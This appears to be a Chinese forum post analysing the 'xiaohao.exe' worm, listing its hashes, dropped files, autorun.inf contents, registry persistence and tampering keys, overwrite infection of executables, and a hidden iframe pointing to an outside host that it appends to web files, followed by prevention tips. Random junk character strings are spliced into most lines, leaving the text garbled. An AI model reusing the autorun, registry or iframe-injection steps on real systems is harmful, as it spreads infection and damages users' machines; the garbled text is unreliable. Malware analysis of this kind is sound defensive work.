|
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe
/ G7 ~3 J+ h8 s4 ]" USize: 12288 bytes
) ?: {: d/ @2 H4 B& @1 Y, lFile Version: 1, 0, 0, 10 `* K0 j" S0 f# U* X
Modified: 2007年8月14日, 21:03:22; m7 ]- g9 f6 V, h, [' t- B& i8 a# B
MD5: B50ED06B61CDCF060D0136784999E50C
; v1 t; C$ t! j* P$ N! ~SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD
2 b9 s' r* n& Y0 b. B4 T. J. cCRC32: 5CC1E47A
5 O. }% ]" Y% M" ^8 N( O加壳方式:UPX * @! I0 Q& l7 X! C2 O
病毒运行后:
6 I7 N+ b% {4 ?/ ?- s+ C; A) l1 D1.生成如下文件:. [9 t* S2 j( p& B. a
%SystemRoot%\system32\exloroe.exe4 n$ O& c7 [) o
每个分区下生成一个xiaohao.exe 和autorun.inf2 k. N1 q! H. z
autorun.inf内容6 _( a9 L7 p$ B; k
[Autorun]+ E# B$ f& ~+ L5 W9 G2 x$ D7 R
open=Xiaohao.exe
2 y/ w9 z* e: r5 X/ _2 qshellexecute=Xiaohao.exe
" B- V& B C9 S, p8 zshell\Auto\command=Xiaohao.exe
0 Q' {, r) B) \7 P1 g: ~' K2.添加注册表项目
1 c& @! L+ i0 c9 ^' U1 N; ZHKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}. X5 Q2 V( `, J) }
指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的
' v1 _7 P6 O1 _& Z; t0 \9 N3.修改注册表键值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue为0x00000000/ P) R1 T& H! h* D
破坏显示隐藏文件
) z f6 M% @ R: f3 B; Z: M* h删除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2- E/ W9 @! Y" R" d& f
从而删除开始菜单中所有的快捷方式
. C$ J/ R. ]) |4.感染文件+ T( m$ G' c7 |! k7 C d
从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的
2 t: V j" B% Texe无法修复
S w$ ]3 x8 D$ Y3 U+ S4 ^从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代码
" a' Y1 u( G" b5 b! X8 H<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>4 Q6 z" B3 I- W' D5 z
所有感染的文件的文件名记录在C:\Jilu.txt里面/ j+ \2 W( C R0 h- A7 m) c
并将所有未能感染的文件属性变为隐藏
+ D8 a/ \" V3 j8 V6 R! A4 H/ F" [5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”: b) e7 O' ~: {' S: Q
6.系统时间改为2005年1月17日
$ O7 b) u1 r8 d% N病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和原先的兔子病毒很相像,为了炫耀。, t/ ^" _ Q0 i% R( |
由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe等核心启动文件被修改从而造成系统启动失败) P( d$ C v) R' }$ H
如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉9 C9 a2 h: d: J; v8 f, b* {. Y# m
希望大家注意如下几点防范此类病毒
, ?$ f4 t) H3 `6 K* l+ {- k, h1.安装还原精灵、冰点还原、雨过天晴等还原软件(没装还软软件的参考下两条)4 ~7 n$ M7 H: n# W4 d
2.及时升级杀毒软件,防火墙,一定打全系统补丁
' L0 @, X6 C- o* Q ?- R% I' K3.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可 |
|